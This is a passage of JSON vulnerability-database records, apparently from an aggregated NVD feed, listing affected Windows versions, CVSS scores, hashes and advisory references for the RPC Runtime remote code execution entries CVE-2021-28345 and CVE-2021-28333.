"cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2021-28345"], "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "cwe": ["NVD-CWE-noinfo"], "description": "Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, CVE-2021-28334, CVE-2021-28335, CVE-2021-28336, CVE-2021-28337, CVE-2021-28338, CVE-2021-28339, CVE-2021-28340, CVE-2021-28341, CVE-2021-28342, CVE-2021-28343, CVE-2021-28344, CVE-2021-28346, CVE-2021-28352, CVE-2021-28353, CVE-2021-28354, CVE-2021-28355, CVE-2021-28356, CVE-2021-28357, CVE-2021-28358, CVE-2021-28434.", "edition": 2, "enchantments": {"dependencies": {"modified": "2021-04-20T09:36:35", "references": [{"idList": ["SMB_NT_MS21_APR_5001337.NASL", "SMB_NT_MS21_APR_5001347.NASL", "SMB_NT_MS21_APR_5001387.NASL", "SMB_NT_MS21_APR_5001382.NASL", "SMB_NT_MS21_APR_5001389.NASL", "SMB_NT_MS21_APR_5001339.NASL", "SMB_NT_MS21_APR_5001342.NASL", "SMB_NT_MS21_APR_5001335.NASL", "SMB_NT_MS21_APR_5001340.NASL"], "type": "nessus"}, {"idList": ["RAPID7BLOG:452CCDC1AEFFF7056148871E86A6FE26"], "type": "rapid7blog"}, {"idList": ["MS:CVE-2021-28345"], "type": "mscve"}], "rev": 2}, "score": {"modified": "2021-04-20T09:36:35", "rev": 2, "value": 3.5, "vector": "NONE"}, "twitter": {"counter": 2, "modified": "2021-04-14T11:37:54", "tweets": [{"link": "https://twitter.com/threatintelctr/status/1384220371822399501", "text": " NEW: CVE-2021-28345 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/CgRDSKukiq?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1384220371822399501", "text": " NEW: CVE-2021-28345 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/CgRDSKukiq?amp=1"}]}}, "extraReferences": [{"name": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28345", "refsource": "MISC", "tags": ["Patch", "Vendor Advisory"], "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28345"}], "hash": "2213d8952ed1436e552d9a0a4e90eab0624547d878ca35636da72bb93bfd3fe2", "hashmap": [{"hash": "d8397aaca09c3d41cbbd37f93b216f7e", "key": "cpe23"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "bf8e4280a569eaa817d54e27e29f9a83", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "0187fd86f792b6c1e0077d0f69d0ed79", "key": "cvss"}, {"hash": "466c447b6119a8be9494fae20b17c9a1", "key": "published"}, {"hash": "a92e17fc8fb3a059e3013f4c0024a43c", "key": "title"}, {"hash": "3f9cb9a60c6041aff951f78697768f11", "key": "cvelist"}, {"hash": "44e70c62e0cc723a53beeda09c7ff46c", "key": "href"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d5b812c11bd119f970b8a32c5b252c9e", "key": "affectedSoftware"}, {"hash": "56dd3b90fdad5434b2e237c2d2c62919", "key": "cpeConfiguration"}, {"hash": "3bf2877e19b91d4143ea460e43ce9041", "key": "cvss2"}, {"hash": "d370d473ba1bd1721d669ef98e2aeebb", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "122bdba5509c507afa2962a93b3d1c93", "key": "cpe"}, {"hash": "e466ef425e8618388370750ba0e6216c", "key": "description"}, {"hash": "f6e8aaad9dbc5a2810f3f6090142eabe", "key": "extraReferences"}, {"hash": "797434013b6a54d859a5263bc756e7a6", "key": "cvss3"}, {"hash": "9d99030debdb2d11755a0f48dd6368d0", "key": "references"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-28345", "id": "CVE-2021-28345", "immutableFields": [], "lastseen": "2021-04-20T09:36:35", "modified": "2021-04-19T18:31:00", "objectVersion": "1.5", "published": "2021-04-13T20:15:00", "references": ["https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28345"], "reporter": "cve@mitre.org", "title": "CVE-2021-28345", "type": "cve", "viewCount": 1}, "different_elements": ["reporter", "cpeConfiguration"], "edition": 2, "lastseen": "2021-04-20T09:36:35"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": []}, "cvelist": ["CVE-2021-28345"], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "cwe": [], "description": "Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, CVE-2021-28334, CVE-2021-28335, CVE-2021-28336, CVE-2021-28337, CVE-2021-28338, CVE-2021-28339, CVE-2021-28340, CVE-2021-28341, CVE-2021-28342, CVE-2021-28343, CVE-2021-28344, CVE-2021-28346, CVE-2021-28352, CVE-2021-28353, CVE-2021-28354, CVE-2021-28355, CVE-2021-28356, CVE-2021-28357, CVE-2021-28358, CVE-2021-28434.", "edition": 1, "enchantments": {"dependencies": {"modified": "2021-04-14T11:37:54", "references": [{"idList": ["SMB_NT_MS21_APR_5001337.NASL", "SMB_NT_MS21_APR_5001347.NASL", "SMB_NT_MS21_APR_5001387.NASL", "SMB_NT_MS21_APR_5001382.NASL", "SMB_NT_MS21_APR_5001389.NASL", "SMB_NT_MS21_APR_5001339.NASL", "SMB_NT_MS21_APR_5001342.NASL", "SMB_NT_MS21_APR_5001335.NASL", "SMB_NT_MS21_APR_5001340.NASL"], "type": "nessus"}, {"idList": ["RAPID7BLOG:452CCDC1AEFFF7056148871E86A6FE26"], "type": "rapid7blog"}, {"idList": ["MS:CVE-2021-28345"], "type": "mscve"}], "rev": 2}, "score": {"modified": "2021-04-14T11:37:54", "rev": 2, "value": 3.5, "vector": "NONE"}, "twitter": {"counter": 2, "modified": "2021-04-14T11:37:54", "tweets": [{"link": "https://twitter.com/threatintelctr/status/1384220371822399501", "text": " NEW: CVE-2021-28345 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/CgRDSKukiq?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1384220371822399501", "text": " NEW: CVE-2021-28345 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/CgRDSKukiq?amp=1"}]}}, "extraReferences": [{"name": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28345", "refsource": "MISC", "tags": [], "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28345"}], "hash": "a544c97fbd3a76543d2b37143cc3f11cbeae114437ac7ed7681c2dc131cd5e3e", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "466c447b6119a8be9494fae20b17c9a1", "key": "published"}, {"hash": "a92e17fc8fb3a059e3013f4c0024a43c", "key": "title"}, {"hash": "3f9cb9a60c6041aff951f78697768f11", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cwe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedSoftware"}, {"hash": "44e70c62e0cc723a53beeda09c7ff46c", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "e466ef425e8618388370750ba0e6216c", "key": "description"}, {"hash": "81342635da437da3b0897e10f103e0d6", "key": "cpeConfiguration"}, {"hash": "9d99030debdb2d11755a0f48dd6368d0", "key": "references"}, {"hash": "cb7b2b66abbb71a732753735236e7f53", "key": "extraReferences"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "40c747f3c7fe2582f50d51b1b5116564", "key": "modified"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-28345", "id": "CVE-2021-28345", "immutableFields": [], "lastseen": "2021-04-14T11:37:54", "modified": "2021-04-13T20:35:00", "objectVersion": "1.5", "published": "2021-04-13T20:15:00", "references": ["https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28345"], "reporter": "cve@mitre.org", "title": "CVE-2021-28345", "type": "cve", "viewCount": 1}, "different_elements": ["extraReferences", "cpe23", "cvss", "cvss3", "cvss2", "modified", "cpe", "cwe", "affectedSoftware", "cpeConfiguration"], "edition": 1, "lastseen": "2021-04-14T11:37:54"}], "edition": 3, "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "d5b812c11bd119f970b8a32c5b252c9e"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "122bdba5509c507afa2962a93b3d1c93"}, {"key": "cpe23", "hash": "d8397aaca09c3d41cbbd37f93b216f7e"}, {"key": "cpeConfiguration", "hash": "64c56abb30602eab96958881fd107551"}, {"key": "cvelist", "hash": "3f9cb9a60c6041aff951f78697768f11"}, {"key": "cvss", "hash": "0187fd86f792b6c1e0077d0f69d0ed79"}, {"key": "cvss2", "hash": "3bf2877e19b91d4143ea460e43ce9041"}, {"key": "cvss3", "hash": "797434013b6a54d859a5263bc756e7a6"}, {"key": "cwe", "hash": "d370d473ba1bd1721d669ef98e2aeebb"}, {"key": "description", "hash": "e466ef425e8618388370750ba0e6216c"}, {"key": "extraReferences", "hash": "f6e8aaad9dbc5a2810f3f6090142eabe"}, {"key": "href", "hash": "44e70c62e0cc723a53beeda09c7ff46c"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "bf8e4280a569eaa817d54e27e29f9a83"}, {"key": "published", "hash": "466c447b6119a8be9494fae20b17c9a1"}, {"key": "references", "hash": "9d99030debdb2d11755a0f48dd6368d0"}, {"key": "reporter", "hash": "029dfc07c499dc142a429cac0a029e99"}, {"key": "title", "hash": "a92e17fc8fb3a059e3013f4c0024a43c"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "a9d5f1df45f912a36092d2b347fc9e6268b9a95a8249052501d74a863951d004", "viewCount": 28, "enchantments": {"dependencies": {"references": [{"type": "mscve", "idList": ["MS:CVE-2021-28345"]}, {"type": "nessus", "idList": ["SMB_NT_MS21_APR_5001340.NASL", "SMB_NT_MS21_APR_5001387.NASL", "SMB_NT_MS21_APR_5001339.NASL", "SMB_NT_MS21_APR_5001347.NASL", "SMB_NT_MS21_APR_5001335.NASL", "SMB_NT_MS21_APR_5001342.NASL", "SMB_NT_MS21_APR_5001389.NASL", "SMB_NT_MS21_APR_5001330.NASL", "SMB_NT_MS21_APR_5001382.NASL", "SMB_NT_MS21_APR_5001337.NASL"]}, {"type": "kaspersky", "idList": ["KLA12142", "KLA12139"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:452CCDC1AEFFF7056148871E86A6FE26"]}], "modified": "2021-04-28T11:49:18", "rev": 2}, "score": {"value": 3.8, "vector": "NONE", "modified": "2021-04-28T11:49:18", "rev": 2}, "twitter": {"counter": 2, "modified": "2021-04-14T11:37:54", "tweets": [{"link": "https://twitter.com/threatintelctr/status/1384220371822399501", "text": " NEW: CVE-2021-28345 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/CgRDSKukiq?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1384220371822399501", "text": " NEW: CVE-2021-28345 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/CgRDSKukiq?amp=1"}]}}, "objectVersion": "1.5", "cpe": ["cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_7:-"], "affectedSoftware": [{"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1809"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1607"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_rt_8.1", "name": "microsoft windows rt 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2019", "name": "microsoft windows server 2019", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "1909"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "2004"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "2004"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_8.1", "name": "microsoft windows 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "20h2"}, {"cpeName": "microsoft:windows_7", "name": "microsoft windows 7", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1909"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1803"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "20h2"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28345", "refsource": "MISC", "tags": ["Patch", "Vendor Advisory"], "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28345"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"], "cwe": ["NVD-CWE-noinfo"], "scheme": null}, {"id": "CVE-2021-28333", "bulletinFamily": "NVD", "title": "CVE-2021-28333", "description": "Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28334, CVE-2021-28335, CVE-2021-28336, CVE-2021-28337, CVE-2021-28338, CVE-2021-28339, CVE-2021-28340, CVE-2021-28341, CVE-2021-28342, CVE-2021-28343, CVE-2021-28344, CVE-2021-28345, CVE-2021-28346, CVE-2021-28352, CVE-2021-28353, CVE-2021-28354, CVE-2021-28355, CVE-2021-28356, CVE-2021-28357, CVE-2021-28358, CVE-2021-28434.", "published": "2021-04-13T20:15:00", "modified": "2021-04-19T20:00:00", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-28333", "reporter": "secure@microsoft.com", "references": ["https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28333"], "cvelist": ["CVE-2021-28333"], "immutableFields": [], "type": "cve", "lastseen": "2021-04-28T11:49:18", "history": [{"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1809"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1607"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_rt_8.1", "name": "microsoft windows rt 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2019", "name": "microsoft windows server 2019", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "1909"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "2004"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "2004"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_8.1", "name": "microsoft windows 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "20h2"}, {"cpeName": "microsoft:windows_7", "name": "microsoft windows 7", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1909"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1803"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "20h2"}], "bulletinFamily": "NVD", "cpe": ["cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_7:-"], "cpe23": ["cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"], "cpeConfiguration": 